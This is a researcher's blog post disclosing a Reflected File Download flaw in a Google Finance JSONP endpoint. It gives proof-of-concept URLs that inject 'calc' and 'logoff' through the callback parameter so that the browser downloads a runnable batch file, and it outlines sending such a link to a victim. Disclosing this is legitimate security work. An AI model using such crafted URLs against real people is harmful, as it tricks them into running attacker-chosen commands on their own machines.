Found this vulnerability when auditing other client. With this RFD you don’t need to create a page to force the download.
The request for this Google JSON file already do this for us.

When I noticed this request:

[code lang=”html”]http://www.google.com/finance/info?q=ELI:ALTR&callback=?[/code]

Which returned the following information:

[code lang=”html”]
// [
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]
[/code]

I wondered if that callback parameter could be manipulated. So I injected “calc” on the request:

[code lang=”html”]http://www.google.com/finance/info?q=ELI:ALTR&callback=calc[/code]

Which returned the following information:

[code lang=”html”]
//
calc([
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]
);
[/code]

Done! Got my injected Windows command on this XHR request. Time to check if the URL is permissive:

[code lang=”html”]http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc[/code]

Guess what? I got a URL that automatically shows the download dialog from Google with a batch file.

I tried successfully with the following browsers:

  • Firefox latest version
  • Opera latest version
  • Internet Explorer 8 and 9

What are the limitations?

I noticed in my testing that most of the chars are being sanitized so it only allows you to use one command without spaces or arguments.

Proof-of-concept:
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc
[when the batch is executed the Windows calculator opens]

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff
[when the batch is executed the system logoffs the authenticated user]

Possible attack scenario:

  1. Attacker sends the URL – http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff – to the victim.
  2. Victim downloads the file and execute it.
  3. After execution of the batch file it will logoff the victim from the operating system.

I made a small video that illustrates my proof-of-concept:

Google decided that this issue has very little or no security impact. Personally I don’t agree but that’s my opinion 🙂
So this RFD is still unpatched. I hope they change their mind and fix this soon.

Leave a Reply